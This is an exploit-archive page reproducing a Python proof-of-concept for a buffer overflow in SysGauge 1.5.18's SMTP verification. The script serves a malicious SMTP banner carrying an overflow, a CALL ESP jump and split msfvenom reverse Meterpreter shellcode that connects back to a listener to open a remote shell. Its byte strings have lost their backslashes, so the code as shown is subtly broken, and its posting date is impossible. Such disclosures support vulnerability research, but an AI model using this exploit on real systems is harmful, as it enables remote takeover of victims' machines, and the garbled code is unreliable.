Home / exploitsPDF  

SysGauge 1.5.18 - Buffer Overflow

Posted on 30 November -0001

<HTML><HEAD><TITLE>SysGauge 1.5.18 - Buffer Overflow</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: SysGauge 1.5.18 – buffer overflow in SMTP connection verification function leads to code execution
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe
# Version: 1.5.18
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : requested
 
# The shellcode has to be split into 2 pieces  for the exploit to work and has to be placed at the offsets like shown below.
# The 1st part can be max. 236 bytes 
# The 2nd part can be max. 76  (leave at least 4 NOPs)
 
 
import socket
 
# QtGui4.dll 0x6527635E - CALL ESP
jmp = "x5ex63x27x65"
nops = "x90"*8
 
 
# reverse meterpreter shell 306 bytes long bad chars x00x0ax0bx20 
#IP: 192.168.198.128, PORT: 4444
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b x00x0ax0dx20 --smallest
 
rev_met_1=("x6ax47x59xd9xeexd9x74x24xf4x5bx81x73x13x1fx2d"
"x97x97x83xebxfcxe2xf4xe3xc5x15x97x1fx2dxf7x1e"
"xfax1cx57xf3x94x7dxa7x1cx4dx21x1cxc5x0bxa6xe5"
"xbfx10x9axddxb1x2exd2x3bxabx7ex51x95xbbx3fxec"
"x58x9ax1exeax75x65x4dx7ax1cxc5x0fxa6xddxabx94"
"x61x86xefxfcx65x96x46x4exa6xcexb7x1exfex1cxde"
"x07xcexadxdex94x19x1cx96xc9x1cx68x3bxdexe2x9a"
"x96xd8x15x77xe2xe9x2exeax6fx24x50xb3xe2xfbx75"
"x1cxcfx3bx2cx44xf1x94x21xdcx1cx47x31x96x44x94"
"x29x1cx96xcfxa4xd3xb3x3bx76xccxf6x46x77xc6x68"
"xffx72xc8xcdx94x3fx7cx1ax42x45xa4xa5x1fx2dxff"
"xe0x6cx1fxc8xc3x77x61xe0xb1x18xd2x42x2fx8fx2c"
"x97x97x36xe9xc3xc7x77x04x17xfcx1fxd2x42xfdx1a"
"x45x57x3fxd9xadxffx95x1fx3cxcbx1exf9x7dxc7xc7"
"x4fx6dxc7xd7x4fx45x7dx98xc0xcdx68x42x88x47x87"
"xc1x48x45x0ex32x6bx4c")
 
 
rev_met_2=("x68x42x9axedxe3x9bxe0x63"
"x9fxe2xf3x45x67x22xbdx7bx68x42x75x2dxfdx93x49"
"x7axffx95xc6xe5xc8x68xcaxa6xa1xfdx5fx45x97x87"
"x1fx2dxc1xfdx1fx45xcfx33x4cxc8x68x42x8cx7exfd"
"x97x49x7exc0xffx1dxf4x5fxc8xe0xf8x96x54x36xeb"
"xe2x79xdcx2dx97x97")
 
 
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
port = 25
s = socket.socket()
ip = '0.0.0.0'            
s.bind((ip, port))            
s.listen(5)                    
 
  
print 'Listening on SMTP port: '+str(port)
print(len(rev_met_1))
print(len(rev_met_2))
  
while True:
    conn, addr = s.accept()     
    conn.send('220 '+buffer+'ESMTP Sendmail 
')
    conn.close()
</BODY></HTML>

 

TOP

Malware :

Exploits :